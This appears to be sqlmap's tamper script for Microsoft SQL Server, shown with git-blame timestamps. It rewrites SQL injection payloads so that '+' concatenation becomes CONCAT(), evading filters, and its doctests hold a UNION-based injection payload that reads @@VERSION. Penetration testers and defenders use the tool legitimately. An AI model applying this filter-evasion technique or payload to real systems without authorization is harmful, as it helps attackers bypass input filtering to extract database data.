2019-05-08 13:47:52 +03:00
#!/usr/bin/env python
2016-12-02 00:28:07 +03:00
"""
2021-09-08 22:01:41 +03:00
Copyright ( c ) 2006 - 2021 sqlmap developers ( https : / / sqlmap . org / )
2017-10-11 15:50:46 +03:00
See the file ' LICENSE ' for copying permission
2016-12-02 00:28:07 +03:00
"""
2018-02-10 13:06:31 +03:00
import os
2017-02-16 18:56:54 +03:00
import re
2018-02-08 18:49:16 +03:00
from lib . core . common import singleTimeWarnMessage
2016-12-02 00:28:07 +03:00
from lib . core . common import zeroDepthSearch
2018-02-08 18:49:16 +03:00
from lib . core . enums import DBMS
2016-12-02 00:28:07 +03:00
from lib . core . enums import PRIORITY
__priority__ = PRIORITY . HIGHEST
def dependencies ( ) :
2018-02-08 18:49:16 +03:00
singleTimeWarnMessage ( " tamper script ' %s ' is only meant to be run against %s " % ( os . path . basename ( __file__ ) . split ( " . " ) [ 0 ] , DBMS . MSSQL ) )
2016-12-02 00:28:07 +03:00
def tamper ( payload , * * kwargs ) :
"""
2018-07-31 03:18:33 +03:00
Replaces plus operator ( ' + ' ) with ( MsSQL ) function CONCAT ( ) counterpart
2016-12-02 00:28:07 +03:00
Tested against :
* Microsoft SQL Server 2012
Requirements :
* Microsoft SQL Server 2012 +
Notes :
* Useful in case ( ' + ' ) character is filtered
>> > tamper ( ' SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL ' )
' SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL '
2017-02-17 12:26:25 +03:00
2019-07-11 13:40:56 +03:00
>> > tamper ( ' 1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe ' )
' 1 UNION ALL SELECT NULL,NULL,CONCAT(CHAR(113),CHAR(118),CHAR(112),CHAR(112),CHAR(113),ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)),CHAR(113),CHAR(112),CHAR(107),CHAR(112),CHAR(113))-- qtfe '
2016-12-02 00:28:07 +03:00
"""
retVal = payload
if payload :
2019-07-11 13:40:56 +03:00
match = re . search ( r " ( ' [^ ' ]+ ' |CHAR \ ( \ d+ \ )) \ +.*(?<= \ +)( ' [^ ' ]+ ' |CHAR \ ( \ d+ \ )) " , retVal )
if match :
part = match . group ( 0 )
chars = [ char for char in part ]
for index in zeroDepthSearch ( part , ' + ' ) :
chars [ index ] = ' , '
replacement = " CONCAT( %s ) " % " " . join ( chars )
retVal = retVal . replace ( part , replacement )
2018-11-30 13:29:17 +03:00
2016-12-02 00:28:07 +03:00
return retVal